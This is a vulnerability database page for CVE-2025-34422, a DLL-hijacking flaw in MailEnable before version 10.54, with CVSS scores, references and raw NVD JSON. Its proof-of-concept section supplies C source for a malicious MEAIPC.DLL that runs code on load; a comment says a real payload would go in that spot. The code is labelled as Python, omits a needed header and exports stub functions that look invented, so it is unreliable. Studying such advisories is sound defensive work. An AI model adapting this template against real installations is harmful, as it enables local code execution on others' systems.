CVE-2025-34422

Description

MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIPC.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIPC.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:* - VULNERABLE

MailEnable < 10.54

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <windows.h>

// Malicious DLL for CVE-2025-34422 PoC
// Compile: gcc -shared -o MEAIPC.dll poc.c

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Create a shell for demonstration
        // In real attack, this would be the malicious payload
        MessageBox(NULL, 
            "CVE-2025-34422 DLL Hijacking PoC\nMailEnable MEAIPC.DLL Loaded!",
            "DLL Hijacking", MB_OK | MB_ICONWARNING);
        
        // Execute calc.exe as proof of code execution
        WinExec("calc.exe", SW_SHOW);
        
        // Log execution to file for persistence check
        FILE *fp = fopen("C:\\Windows\\Temp\\cve_2025_34422_poc.log", "a");
        if (fp) {
            fprintf(fp, "[+] CVE-2025-34422 exploited at %s\n", __TIMESTAMP__);
            fclose(fp);
        }
    }
    return TRUE;
}

// Export original DLL functions to ensure compatibility
int MEAIPC_Initialize(void) {
    return 0;
}

int MEAIPC_Connect(char *server, int port) {
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34422
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34422
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34422/
[4] VulDB https://vuldb.com/cve/CVE-2025-34422
[5] https://mailenable.com/Standard-ReleaseNotes.txt
[6] https://www.mailenable.com/
[7] https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaipc-dll

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34422", "sourceIdentifier": "[email protected]", "published": "2025-12-10T16:16:25.860", "lastModified": "2025-12-23T15:02:56.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIPC.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIPC.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:*", "versionEndExcluding": "10.54", "matchCriteriaId": "E4DAB799-EDB6-48D7-A7FD-77D9910CB308"}]}]}], "references": [{"url": "https://mailenable.com/Standard-ReleaseNotes.txt", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.mailenable.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaipc-dll", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}